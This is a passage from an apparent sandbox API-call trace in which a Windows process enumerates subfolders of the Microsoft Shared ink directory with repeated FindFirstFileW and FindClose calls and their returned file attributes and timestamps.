ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.503] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.503] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.503] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.504] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.504] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.504] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.505] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.505] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.506] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.507] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.508] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.509] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.509] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.509] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.510] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.511] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.511] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.511] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.511] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.511] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.511] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.512] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.512] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.512] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.512] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.512] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.513] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.513] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.513] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.513] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.514] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.514] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.514] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.514] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.515] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.515] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.515] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.515] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.516] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.516] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.516] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.516] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.517] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.517] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.517] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.517] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.518] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.518] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.518] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.519] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.519] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.519] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.519] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.519] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.520] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.520] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.520] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.520] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.521] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.521] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.521] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.521] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.522] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.522] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.523] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.523] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.523] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.523] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.523] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.524] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.524] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.524] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.524] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.525] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, 